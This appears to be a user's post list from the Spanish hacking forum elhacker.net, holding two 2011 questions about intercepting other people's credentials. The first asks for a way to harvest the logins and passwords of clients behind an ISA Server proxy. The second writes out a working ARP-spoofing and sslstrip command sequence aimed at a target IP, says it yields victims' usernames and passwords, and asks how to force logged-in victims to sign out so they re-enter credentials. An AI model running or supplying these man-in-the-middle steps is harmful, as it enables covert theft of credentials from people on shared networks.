elhacker.net cabecera Bienvenido(a), Visitante. Por favor Ingresar o Registrarse
¿Perdiste tu email de activación?.

 

 


Tema destacado: Guía actualizada para evitar que un ransomware ataque tu empresa


  Mostrar Temas
Páginas: [1]
1  Seguridad Informática / Hacking / Isa Server ver login & pass en: 23 Noviembre 2011, 06:28 am
Buenas,
después de mucho indagar en linux sobre MITM y sus posibilidades me planteo una situación.

Quisiera saber sí existe algún script o filtro que se le aplique a Isa Server para monitorizar los login y passwords de los clientes conectados a el ya que el propio Isa Server se puede decir que hace de MITM. Se que existe cain y abel, pero ya que todo el tráfico pasa atraves del Isa Server he pensado que debería ser más fácil dado que actúa como una especie de proxy.

Thanks
2  Seguridad Informática / Hacking / sslstrip & arpspoof (cerrar conexión) en: 13 Noviembre 2011, 20:21 pm
Hola a todos, aunque llevo tiempo siguiendo este foro hoy he decidido poner en un hilo una cuestión que me trae de cabeza.

Llevo tiempo usando sslstrip para monitorizar las conexiones SSL y junto con arpspoof pues perfecto de la siguiente manera:

Código:
echo 1 > /proc/sys/net/ipv4/ip_forward
iptables -t nat -A PREROUTING -p tcp --destination-port 80 -j REDIRECT --to-port 8080
arpspoof -i wlan0 -t 192.168.1.100 192.168.1.1
python sslstrip.py -l 8080

Después miro el archivo.log de sslstrip y listo ahí aparecen los usuarios y contraseñas, pero con un problema. Aparecen, si no tiene iniciada la sesión en la página. Si ya ha iniciado la sesión me aparecen caracteres raros de "id" (secuencia de números).

¿Como puedo obligarle a cerrar la sesión para que tenga que logearse de nuevo?. Con ettercap lo he hecho pero el problema es que ettercap no funciona nada bien con el sslstrip en backtrak. Me da el famoso error "send l3 error".

Gracias a todos.

Páginas: [1]
WAP2 - Aviso Legal - Powered by SMF 1.1.21 | SMF © 2006-2008, Simple Machines